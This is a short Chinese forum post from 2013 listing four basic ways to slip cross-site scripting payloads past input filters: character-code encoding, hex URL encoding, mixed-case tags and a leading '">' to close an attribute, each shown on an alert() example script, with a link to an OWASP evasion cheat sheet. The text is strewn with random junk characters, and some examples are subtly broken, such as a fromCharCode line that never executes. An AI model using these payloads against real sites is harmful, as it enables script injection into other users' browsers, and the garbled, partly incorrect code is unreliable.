四种超级基础的绕过方法。* r! p5 \ b- N$ t1 y
1.转换为ASCII码) O: ?. v( Y' z( E3 e# }
例子:原脚本为<script>alert(‘I love F4ck’)</script >. t6 ?3 R4 B2 R' ?3 P
通过转换,变成:
8 v1 ]/ i4 p7 O& n' C# J7 I<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>" I( x$ b. t+ {" j$ H3 o5 j: ]
9 s5 q/ Q3 Y5 H: ?8 M3 ?- I2.转换为HEX(十六进制)
+ w) \" f1 Q- x$ x3 u5 r* Z, i! w例子:原脚本为<script>alert(‘I love F4ck’)</script>1 _2 i5 J9 N0 m2 s4 G. g7 y0 B
通过转换,变成:
* B# @. _) a% T%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e1 t( h: A( A6 c/ W2 Z
" @9 Y: u' P* G# E
3.转换脚本的大小写
' G& N7 F% \$ j. Z6 H: l例子:原脚本为<script>alert(‘I love F4ck’)</script>
3 b1 e) R% s% p" b, v9 a转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>9 C# O* }* Y7 ?0 X, K
$ Y" J8 \9 D& L! Z- x4.增加闭合标记”>) W. ~/ t% J3 n
例子:原脚本为<script>alert(‘I love F4ck’)</script>
8 @8 S4 E9 D" v! ~ u- b转换为:”><script>alert(‘I love F4ck’)</script>
- P( K1 B8 @( `更详细绕过技术请参考此网页& T( }3 p1 P2 J1 V ^7 k. t
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet1 ^7 C3 K6 B8 r/ H
% j1 {, \# T" G# \8 k( b# J! z# j
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对